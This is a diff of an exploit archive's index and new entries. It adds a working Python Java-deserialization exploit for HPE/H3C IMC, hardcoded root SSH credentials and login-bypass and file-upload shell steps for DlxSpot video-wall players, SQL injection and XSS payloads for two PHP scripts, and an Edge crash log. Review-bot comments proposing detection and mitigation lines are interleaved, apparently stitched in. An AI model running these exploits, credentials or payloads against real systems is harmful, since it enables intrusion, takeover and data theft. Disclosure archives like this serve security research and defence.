 38679,platforms/php/webapps/38679.txt,"Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0
 38682,platforms/php/webapps/38682.txt,"Jahia xCM - '/engines/manager.jsp' 'site' Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0
 38683,platforms/php/webapps/38683.txt,"Jahia xCM - '/administration/' Multiple Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0
-38688,platforms/php/webapps/38688.txt,"b374k Web Shell 3.2.3/2.8 - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,php,webapps,0
+38688,platforms/php/webapps/38688.txt,"b374k 3.2.3/2.8 (Web Shell) - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,php,webapps,0
 38689,platforms/php/webapps/38689.txt,"Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0
 38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server - Multiple SQL Injections",2013-08-07,"Yogesh Phadtare",cgi,webapps,0
 38693,platforms/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0
@@ -36941,7 +36945,7 @@ id,file,description,date,author,platform,type,port
 39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0
 39065,platforms/php/webapps/39065.txt,"Eventum - Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps,0
 39066,platforms/php/webapps/39066.txt,"Eventum 2.3.4 - 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0
-39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0
+39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0
 39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution",2015-12-21,bd0rk,php,webapps,80
 39078,platforms/php/webapps/39078.txt,"Web Video Streamer - Multiple Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0
 39079,platforms/php/webapps/39079.txt,"Atmail WebMail - Message Attachment File Name Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0
@@ -37005,7 +37009,7 @@ id,file,description,date,author,platform,type,port
 39179,platforms/php/webapps/39179.txt,"CMS Touch - 'news.php' News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0
 39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' Parameter SQL Injection",2014-05-16,Edge,asp,webapps,0
-39188,platforms/php/webapps/39188.txt,"XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0
+39188,platforms/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0
 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0
 39190,platforms/php/webapps/39190.php,"WordPress Plugin cnhk-Slideshow - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0
 39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager - 'backend/PHP/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0
@@ -37469,7 +37473,7 @@ id,file,description,date,author,platform,type,port
 40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80
 40295,platforms/php/webapps/40295.txt,"WordPress Plugin CYSTEME Finder 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80
 40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0
-40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials Remote SYSTEM Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088
+40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials SYSTEM Remote Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088
 40325,platforms/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)",2016-08-31,LiquidWorm,jsp,webapps,8088
 40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088
 40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
@@ -38528,4 +38532,8 @@ id,file,description,date,author,platform,type,port
 42738,platforms/asp/webapps/42738.py,"DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0
 42739,platforms/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",hardware,webapps,0
 42740,platforms/hardware/webapps/42740.txt,"iBall ADSL2+ Home Router - Authentication Bypass",2017-09-18,"Gem George",hardware,webapps,0
-42745,platforms/linux/webapps/42745.py,"Apache - HTTP OPTIONS Memory Leak",2017-09-18,"Hanno Bock",linux,webapps,0
+42745,platforms/linux/webapps/42745.py,"Apache < 2.2.34 / < 2.4.27 - HTTP OPTIONS Memory Leak",2017-09-18,"Hanno Bock",linux,webapps,0
+42751,platforms/php/webapps/42751.txt,"Foodspotting Clone 1.0 - SQL Injection",2017-09-13,8bitsec,php,webapps,0
+42752,platforms/php/webapps/42752.txt,"iTech Gigs Script 1.20 - 'cat' Parameter SQL Injection",2017-09-15,8bitsec,php,webapps,0
+42754,platforms/php/webapps/42754.txt,"Tecnovision DLX Spot - Authentication Bypass",2017-05-14,"Simon Brannstrom",php,webapps,0
+42755,platforms/php/webapps/42755.txt,"Tecnovision DLX Spot - Arbitrary File Upload",2017-05-14,"Simon Brannstrom",php,webapps,0
diff --git a/platforms/java/remote/42756.py b/platforms/java/remote/42756.py
new file mode 100755
index 000000000..668aa7486
--- /dev/null
+++ b/platforms/java/remote/42756.py
@@ -0,0 +1,104 @@ +#!/usr/bin/env python + +######################################################################################################## +# +# HPE/H3C IMC - Java Deserialization Exploit +# +# Version 0.1 +# Tested on Windows Server 2008 R2 +# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91 +# +# Author: +# Raphael Kuhn (Daimler TSS) +# +# Special thanks to: +# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon +# +####################################################################################################### + +import requests +import sys +import os +import os.path +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +host = "127.0.0.1:8080" +payload_file = "payload.bin" +body = "" + +def printUsage () : + print "......................................................................................................................" + print "." + print ". HPE/H3C - IMC Java Deserialization Exploit" + print "." + print ". Example 1: -payload-binary" + print ". [-] Usage: %s http[s]://: -payload-binary payload" % sys.argv[0] + print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0] + print ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) " + print ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin" + print ". 2. Send request to server" + print ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0] + print "." + print ". Example 2: -payload-string" + print '. [-] Usage: %s http[s]://: -payload-string "payload"' % sys.argv[0] + print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0] + print ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)" + print '. 
%s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0] + print "." + print "......................................................................................................................" + +def loadPayloadFile (_fileName) : + print "[+] Load payload file %s" % _fileName + payloadFile = open(_fileName, 'rb') + payloadFile_read = payloadFile.read() + return payloadFile_read + +def exploit (_payload) : + url = sys.argv[1] + url += "/imc/topo/WebDMServlet" + print "[+] Sending exploit to %s" % (url) + data = _payload + response = requests.post(url, data=data, verify=False) + return response + +#def showResponse(_response): +# r = response +# m = r.search(_response) +# if (m.find("java.lang.NullPointerException")): +# print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)" +# else: +# print "[-] ClassCastException not found, exploit failed" + + +if __name__ == "__main__": + if len(sys.argv) < 4: + printUsage() + sys.exit(0) + else: + print "------------------------------------------" + print "- HPE/H3C - IMC Java Deserialization Exploit -" + print "------------------------------------------" + host = sys.argv[1] + print "[*] Connecting to %s" %host + if sys.argv[2] == "-payload-binary": + payload_file = sys.argv[3] + if os.path.isfile(payload_file): + payload = loadPayloadFile(payload_file) + response = exploit(payload) + showResponse(response.content) + else: + print "[-] Can't load payload file" + elif sys.argv[2] == "-payload-string": + if os.path.isfile("ysoserial.jar"): + sPayload = sys.argv[3] + sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin" + print "[+] Create payload file (%s) " %sPayload + os.system(sPayload) + payload = loadPayloadFile(payload_file) + response = exploit(payload) + print "[+] Response received, exploit finished." + else: + print "[-] Can't load ysoserial.jar" + else: + printUsage() 
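Review bot: The header comment of 42756.py records a script version and a test platform but no affected IMC release range, CVE or vendor advisory, so a defender triaging this entry cannot tell which installations need patching. The DlxSpot entries added in the same commit carry `# Version:` and `# CVE:` lines; this header should follow suit with `# Affected versions: <not stated on this page>` and `# CVE / advisory: <not stated on this page>`. What the hunk does establish for detection is the request shape: `exploit()` issues a credential-less `requests.post` of a serialized Java object to `/imc/topo/WebDMServlet`, so a one-line `# Detection:` comment naming that path and the Java serialization stream header (`AC ED 00 05`) at the start of the POST body would let operators write a filter or alert from the entry itself.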
diff --git a/platforms/multiple/remote/42753.txt b/platforms/multiple/remote/42753.txt new file mode 100755 index 000000000..de473d2e5 --- /dev/null +++ b/platforms/multiple/remote/42753.txt @@ -0,0 +1,34 @@ +# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password. +# Google Dork: "DlxSpot - Player4" +# Date: 2017-05-14 +# Discoverer: Simon Brannstrom +# Authors Website: https://unknownpwn.github.io/ +# Vendor Homepage: http://www.tecnovision.com/ +# Software Link: n/a +# Version: All known versions +# Tested on: Linux +# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc. +# CVE: CVE-2017-12928 +# Linked CVE's: CVE-2017-12929, CVE-2017-12930 + +# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access. +############################################################################################################################### + +Hardcoded password for all dlxspot players, login with the following credentials via SSH + +username: dlxuser +password: tecn0visi0n + +Escalate to root with the same password. + +TIMELINE: +2017-05-14 - Discovery of vulnerabilities. +2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage. +2017-06-01 - No response, tried contacting again through several contact forms on homepage. +2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment. +2017-08-17 - Three CVE's assigned for the vulnerabilities found. +2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company. +2017-09-18 - No response, full public disclosure. + + DEDICATED TO MARCUS ASTROM +FOREVER LOVED - NEVER FORGOTTEN \ No newline at end of file 
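Review bot: The advisory in 42753.txt ends at the disclosure timeline without any mitigation guidance, although its `# Version:` line says all known versions are affected and the timeline records that the vendor never responded, so operators have no fix to wait for. A short paragraph should be added before `TIMELINE:`, for example `Mitigation: no vendor fix is recorded; keep the player's SSH service unreachable from untrusted networks and change the account passwords if the device allows it.` The same gap applies to the 42754.txt and 42755.txt hunks further down (admin-interface SQL injection and file upload), where the equivalent line would restrict access to the web admin interface and `resource.php`.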
diff --git a/platforms/php/webapps/42751.txt b/platforms/php/webapps/42751.txt new file mode 100755 index 000000000..6735a908a --- /dev/null +++ b/platforms/php/webapps/42751.txt @@ -0,0 +1,44 @@ +# Exploit Title: Foodspotting Clone v1.0 - SQL Injection/Reflected XSS +# Date: 2017-09-13 +# Exploit Author: 8bitsec +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link: http://www.phpscriptsmall.com/product/foodspotting-clone/ +# Version: 1.0 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-09-13 + +Product & Service Introduction: +=============================== +Foodspotting Clone allows you to initiate your very own social networking website that similar appearance as Foodspotting and additional food lover websites. + +Technical Details & Description: +================================ + +Reflected XSS/SQL injection on [resid] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +http://localhost/[path]/restaurant-menu.php?resid=' AND SLEEP(5) AND 'nhSH'='nhSH + +Parameter: resid (GET) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: resid=' AND SLEEP(5) AND 'nhSH'='nhSH + + Type: UNION query + Title: Generic UNION query (NULL) - 14 columns + Payload: resid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x435a72445467737074496d6e5a7855726f6e534c4b6469705774427550576c70676d425361626642,0x71767a6271),NULL,NULL,NULL-- aIwp + +Reflected XSS: + +http://localhost/[path]/restaurant-menu.php?resid=/"> +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/42752.txt b/platforms/php/webapps/42752.txt new file mode 100755 index 000000000..d7885ef54 --- /dev/null +++ b/platforms/php/webapps/42752.txt 
@@ -0,0 +1,37 @@ +# Exploit Title: iTech Gigs Script v1.20 - SQL Injection +# Date: 2017-09-15 +# Exploit Author: 8bitsec +# Vendor Homepage: http://itechscripts.com/ +# Software Link: http://itechscripts.com/the-gigs-script/ +# Version: 1.20 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-09-15 + +Product & Service Introduction: +=============================== +Designed to launch an online market place facilitating participation of professionals from diverse walks of life. + +Technical Details & Description: +================================ + +SQL injection on [cat] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +http://localhost/[path]/browse-category.php?cat=xxxxx' AND 4079=4079 AND 'zpSy'='zpSy + +Parameter: cat (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: cat=10c4ca4238a0b923820dcc509a6f75849b' AND 4079=4079 AND 'zpSy'='zpSy + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/42754.txt b/platforms/php/webapps/42754.txt new file mode 100755 index 000000000..f6835f18a --- /dev/null +++ b/platforms/php/webapps/42754.txt 
@@ -0,0 +1,43 @@ +# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL +Injection +# Google Dork: "DlxSpot - Player4" +# Date: 2017-05-14 +# Discoverer: Simon Brannstrom +# Authors Website: https://unknownpwn.github.io/ +# Vendor Homepage: http://www.tecnovision.com/ +# Software Link: n/a +# Version: >1.5.10 +# Tested on: Linux +# About: DlxSpot is the software controlling Tecnovision LED Video Walls +all over the world, they are used in football arenas, concert halls, +shopping malls, as roadsigns etc. +# CVE: CVE-2017-12930 +# Linked CVE's: CVE-2017-12928, CVE-2017-12929 + +# Visit my github page at +https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md +for complete takeover of the box, from SQLi to full root access. +############################################################################################################################### + +DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection +vulnerability in the admin interface login and is exploitable the following +way: + +username:admin +password:x' or 'x'='x + +TIMELINE: +2017-05-14 - Discovery of vulnerabilities. +2017-05-15 - Contacted Tecnovision through contact form on manufacturer +homepage. +2017-06-01 - No response, tried contacting again through several contact +forms on homepage. +2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) +requesting CVE assignment. +2017-08-17 - Three CVE's assigned for the vulnerabilities found. +2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an +email in Italian to the company. +2017-09-18 - No response, full public disclosure. + + DEDICATED TO MARCUS ASTROM +FOREVER LOVED - NEVER FORGOTTEN diff --git a/platforms/php/webapps/42755.txt b/platforms/php/webapps/42755.txt new file mode 100755 index 000000000..45fbea286 --- /dev/null +++ b/platforms/php/webapps/42755.txt 
@@ -0,0 +1,43 @@ +# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload +to RCE +# Google Dork: "DlxSpot - Player4" +# Date: 2017-05-14 +# Discoverer: Simon Brannstrom +# Authors Website: https://unknownpwn.github.io/ +# Vendor Homepage: http://www.tecnovision.com/ +# Software Link: n/a +# Version: >1.5.10 +# Tested on: Linux +# About: DlxSpot is the software controlling Tecnovision LED Video Walls +all over the world, they are used in football arenas, concert halls, +shopping malls, as roadsigns etc. +# CVE: CVE-2017-12929 +# Linked CVE's: CVE-2017-12928, CVE-2017-12930. + +# Visit my github page at +https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md +for complete takeover of the box, from SQLi to root access. +############################################################################################################################### + +Arbitrary File Upload leading to Remote Command Execution: + +1. Visit http://host/resource.php and upload PHP shell. For example: +2. RCE via http://host/resource/source/shell.php?c=id +3. Output: www-data + +TIMELINE: +2017-05-14 - Discovery of vulnerabilities. +2017-05-15 - Contacted Tecnovision through contact form on manufacturer +homepage. +2017-06-01 - No response, tried contacting again through several contact +forms on homepage. +2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) +requesting CVE assignment. +2017-08-17 - Three CVE's assigned for the vulnerabilities found. +2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an +email in Italian to the company. +2017-09-18 - No response, full public disclosure. + + DEDICATED TO MARCUS ASTROM +FOREVER LOVED - NEVER FORGOTTEN diff --git a/platforms/windows/dos/42758.txt b/platforms/windows/dos/42758.txt new file mode 100755 index 000000000..13a5c82d2 --- /dev/null +++ b/platforms/windows/dos/42758.txt 
@@ -0,0 +1,115 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1309 + +There is a security issue in Microsoft Edge related to how HTML documents are loaded. If Edge displays a HTML document from a slow HTTP server, it is possible that a part of the document is going to be rendered before the server has finished sending the document. It is also possible that some JavaScript code is going to trigger. + +By making DOM modifications before the document had a chance of fully loading, followed by another set of DOM modifications afer the page has been loaded, it is possible to trigger memory corruption that could possibly lead to an exploitable condition. + +A debug log is included below. Note that the crash RIP directly preceeds a (CFG-protected) indirect call, which demonstrates the exploitability of the issue. + +Since a custom HTTP server is needed to demonstrate the issue, I'm attaching all of the required code. Simply run server.py and point Edge to http://127.0.0.1:8000/ + +Note: this has been tested on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393) + + +Debug log: + +========================================= + +(a68.9c0): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa: +00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=???????????????? 
+ +0:013> k + # Child-SP RetAddr Call Site +00 000000eb`c42f8da0 00007ffa`9d8b243d edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa +01 000000eb`c42f8dd0 00007ffa`9d8b28e2 edgehtml!Collections::SGrowingArray >::DeleteAt+0x89 +02 000000eb`c42f8e00 00007ffa`9d8b0cd7 edgehtml!Undo::UndoNodeList::RemoveNodesCompletelyContained+0x5e +03 000000eb`c42f8e30 00007ffa`9d8ad79b edgehtml!Undo::WrapUnwrapNodeUndoUnit::RemoveNodesAtOldPosition+0x33 +04 000000eb`c42f8e70 00007ffa`9d5b303d edgehtml!Undo::MoveForestUndoUnit::HandleWrapUnwrap+0x6b +05 000000eb`c42f8f10 00007ffa`9d8ac629 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa3fd +06 000000eb`c42f8f60 00007ffa`9d5b3085 edgehtml!Undo::ParentUndoUnit::ApplyScriptedOperationToChildren+0xb5 +07 000000eb`c42f8ff0 00007ffa`9d11035c edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa445 +08 000000eb`c42f9040 00007ffa`9d110125 edgehtml!Undo::UndoManager::ApplyScriptedOperationsToUserUnits+0x11c +09 000000eb`c42f9130 00007ffa`9d1d6f0d edgehtml!Undo::UndoManager::SubmitUndoUnit+0x125 +0a 000000eb`c42f9170 00007ffa`9dc9c9ae edgehtml!CSelectionManager::CreateAndSubmitSelectionUndoUnit+0x141 +0b 000000eb`c42f9200 00007ffa`9dc90b70 edgehtml!CRemoveFormatBaseCommand::PrivateExec+0xae +0c 000000eb`c42f92c0 00007ffa`9dc9057a edgehtml!CCommand::Exec+0xe8 +0d 000000eb`c42f9350 00007ffa`9d55e481 edgehtml!CMshtmlEd::Exec+0x17a +0e 000000eb`c42f93b0 00007ffa`9d39cc34 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xa5841 +0f 000000eb`c42f9470 00007ffa`9d21d6a1 edgehtml!CDoc::ExecHelper+0x5d18 +10 000000eb`c42fb020 00007ffa`9d1dbb57 edgehtml!CDocument::Exec+0x41 +11 000000eb`c42fb070 00007ffa`9d1dba25 edgehtml!CBase::execCommand+0xc7 +12 000000eb`c42fb0f0 00007ffa`9d1db8ac edgehtml!CDocument::execCommand+0x105 +13 000000eb`c42fb2e0 
00007ffa`9d498155 edgehtml!CFastDOM::CDocument::Trampoline_execCommand+0x124 +14 000000eb`c42fb3f0 00007ffa`9c930e37 edgehtml!CFastDOM::CDocument::Profiler_execCommand+0x25 +15 000000eb`c42fb420 00007ffa`9c9e9073 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x177 +16 000000eb`c42fb500 00007ffa`9c9596cd chakra!amd64_CallFunction+0x93 +17 000000eb`c42fb560 00007ffa`9c95cec7 chakra!Js::InterpreterStackFrame::OP_CallCommon > > >+0x15d +18 000000eb`c42fb600 00007ffa`9c960f52 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex > >+0xa7 +19 000000eb`c42fb680 00007ffa`9c95f1b2 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x132 +1a 000000eb`c42fb710 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x142 +1b 000000eb`c42fb770 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0 +1c 000000eb`c42fbad0 00000284`bf4b0fa2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55 +1d 000000eb`c42fbb20 00007ffa`9c9e9073 0x00000284`bf4b0fa2 +1e 000000eb`c42fbb50 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93 +1f 000000eb`c42fbba0 00007ffa`9c95abc0 chakra!Js::JavascriptFunction::CallFunction<1>+0x83 +20 000000eb`c42fbc00 00007ffa`9c95f65d chakra!Js::InterpreterStackFrame::OP_CallI > > >+0x110 +21 000000eb`c42fbc50 00007ffa`9c95f217 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d +22 000000eb`c42fbce0 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x1a7 +23 000000eb`c42fbd40 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0 +24 000000eb`c42fc090 00000284`bf4b0faa chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55 +25 000000eb`c42fc0e0 00007ffa`9c9e9073 0x00000284`bf4b0faa +26 000000eb`c42fc110 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93 +27 000000eb`c42fc160 00007ffa`9c98ce3c chakra!Js::JavascriptFunction::CallFunction<1>+0x83 +28 000000eb`c42fc1c0 00007ffa`9c98c406 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104 +29 000000eb`c42fc2b0 
00007ffa`9c9ce4d9 chakra!Js::JavascriptFunction::CallRootFunction+0x4a +2a 000000eb`c42fc320 00007ffa`9c9928a1 chakra!ScriptSite::CallRootFunction+0xb5 +2b 000000eb`c42fc3c0 00007ffa`9c98e45c chakra!ScriptSite::Execute+0x131 +2c 000000eb`c42fc450 00007ffa`9d333b2d chakra!ScriptEngineBase::Execute+0xcc +2d 000000eb`c42fc4f0 00007ffa`9d333a78 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d +2e 000000eb`c42fc540 00007ffa`9d35ac27 edgehtml!CJScript9Holder::ExecuteCallback+0x18 +2f 000000eb`c42fc580 00007ffa`9d35aa17 edgehtml!CListenerDispatch::InvokeVar+0x1fb +30 000000eb`c42fc700 00007ffa`9d33247a edgehtml!CListenerDispatch::Invoke+0xdb +31 000000eb`c42fc780 00007ffa`9d415a62 edgehtml!CEventMgr::_InvokeListeners+0x2ca +32 000000eb`c42fc8e0 00007ffa`9d290715 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66 +33 000000eb`c42fc910 00007ffa`9d2901a3 edgehtml!CEventMgr::Dispatch+0x405 +34 000000eb`c42fcbe0 00007ffa`9d37434a edgehtml!CEventMgr::DispatchEvent+0x73 +35 000000eb`c42fcc30 00007ffa`9d3ac5a2 edgehtml!COmWindowProxy::Fire_onload+0x14e +36 000000eb`c42fcd40 00007ffa`9d3ab23e edgehtml!CMarkup::OnLoadStatusDone+0x376 +37 000000eb`c42fce00 00007ffa`9d3aa72f edgehtml!CMarkup::OnLoadStatus+0x112 +38 000000eb`c42fce30 00007ffa`9d328d93 edgehtml!CProgSink::DoUpdate+0x3af +39 000000eb`c42fd2c0 00007ffa`9d32a550 edgehtml!GlobalWndOnMethodCall+0x273 +3a 000000eb`c42fd3c0 00007ffa`b7a31c24 edgehtml!GlobalWndProc+0x130 +3b 000000eb`c42fd480 00007ffa`b7a3156c user32!UserCallWinProcCheckWow+0x274 +3c 000000eb`c42fd5e0 00007ffa`9347d421 user32!DispatchMessageWorker+0x1ac +3d 000000eb`c42fd660 00007ffa`9347c9e1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1 +3e 000000eb`c42ff8b0 00007ffa`ad7e9586 EdgeContent!LCIETab_ThreadProc+0x2c1 +3f 000000eb`c42ff9d0 00007ffa`b7978364 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16 +40 000000eb`c42ffa00 00007ffa`ba0a70d1 KERNEL32!BaseThreadInitThunk+0x14 +41 000000eb`c42ffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21 + 
+0:013> r +rax=00000284bc287fd8 rbx=00000284bc287f90 rcx=00000000abcdbbbb +rdx=0000000000000000 rsi=0000000000000017 rdi=0000000000000000 +rip=00007ffa9d5f15ea rsp=000000ebc42f8da0 rbp=000000ebc42f8fb0 + r8=0000000000000017 r9=000000ebc42f8e78 r10=00000fff53a47750 +r11=0000000000010000 r12=0000027cb4fbcd10 r13=0000027cb4f95a78 +r14=000000ebc42f8e70 r15=0000000000000000 +iopl=0 nv up ei pl nz na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa: +00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=???????????????? + +0:013> u 00007ffa`9d5f15ea +edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa: +00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] +00007ffa`9d5f15ed 488b80d0050000 mov rax,qword ptr [rax+5D0h] +00007ffa`9d5f15f4 ff15c654ab00 call qword ptr [edgehtml!_guard_dispatch_icall_fptr (00007ffa`9e0a6ac0)] + +========================================= + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42758.zip diff --git a/platforms/windows/dos/42759.html b/platforms/windows/dos/42759.html new file mode 100755 index 000000000..981696e3a --- /dev/null +++ b/platforms/windows/dos/42759.html @@ -0,0 +1,230 @@ + + + + + + + + + \ No newline at end of file